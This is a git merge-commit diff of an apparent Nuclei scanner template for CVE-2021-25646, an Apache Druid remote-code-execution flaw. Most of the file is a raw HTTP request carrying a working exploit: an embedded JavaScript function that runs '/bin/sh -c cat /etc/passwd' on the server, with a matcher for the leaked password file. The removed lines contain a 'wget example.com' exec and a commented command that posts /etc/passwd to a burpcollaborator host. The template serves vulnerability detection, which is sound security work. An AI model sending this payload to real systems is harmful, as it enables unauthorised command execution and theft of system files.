Merge pull request #1780 from wwilson83H3/master

The default request never flagged druid in my env. Replaced with MSF …
2021-06-30 20:32:14 +05:30 · 2021-06-30 20:32:14 +05:30 · 3602eebf6c
parent e723123779 d1f47657a9
commit 3602eebf6c
1 changed files with 42 additions and 15 deletions
--- a/cves/2021/CVE-2021-25646.yaml
+++ b/cves/2021/CVE-2021-25646.yaml
@ -13,25 +13,47 @@ info:
 requests:
  - raw:
      - |
-        POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1
+        POST /druid/indexer/v1/sampler HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Content-Type: application/json
        Content-Length: 1006
        Connection: close

-        {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["https://druid.apache.org/data/example-manifests.tsv"]},"inputFormat":{"type":"tsv","findColumnsFromHeader":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"timestamp","missingValue":"2010-01-01T00:00:00Z"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type": "javascript",
-                                                "function": "function(value){return java.lang.Runtime.getRuntime().exec('wget example.com')}",
-                                                "dimension": "added",
-                                                "": {
-                                                        "enabled": "true"
-                                                }
-                                        }
-                                }
-          },"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":50,"timeoutMs":10000}}
+        {
+        "type":"index",
+        "spec":{
+           "ioConfig":{
+              "type":"index",
+              "firehose":{
+                 "type":"local",
+                 "baseDir":"/etc",
+                 "filter":"passwd"
+              }
+           },
+           "dataSchema":{
+              "dataSource":"odgjxrrrePz",
+              "parser":{
+                 "parseSpec":{
+                    "format":"javascript",
+                    "timestampSpec":{

-    # To read system Files, replace (wget example.com) with below payload
-    # wget --post-file /etc/passwd http://xxxxxxx.burpcollaborator.net
+                    },
+                    "dimensionsSpec":{
+
+                    },
+                    "function":"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"/bin/sh`@~-c`@~cat /etc/passwd\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"4137368\",OQtGXcxBVQVL: hTVCCerYZ}}",
+                    "":{
+                       "enabled":"true"
+                    }
+                 }
+              }
+           }
+        },
+        "samplerConfig":{
+           "numRows":10
+        }
+        }

    matchers-condition: and
    matchers:
@ -42,10 +64,15 @@ requests:
        words:
          - "application/json"
        part: header
-        condition: and
-      - type: regex
-        regex:
+
+      - type: word
+        words:
          - "numRowsRead"
          - "numRowsIndexed"
        part: body
        condition: and
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"
+        part: body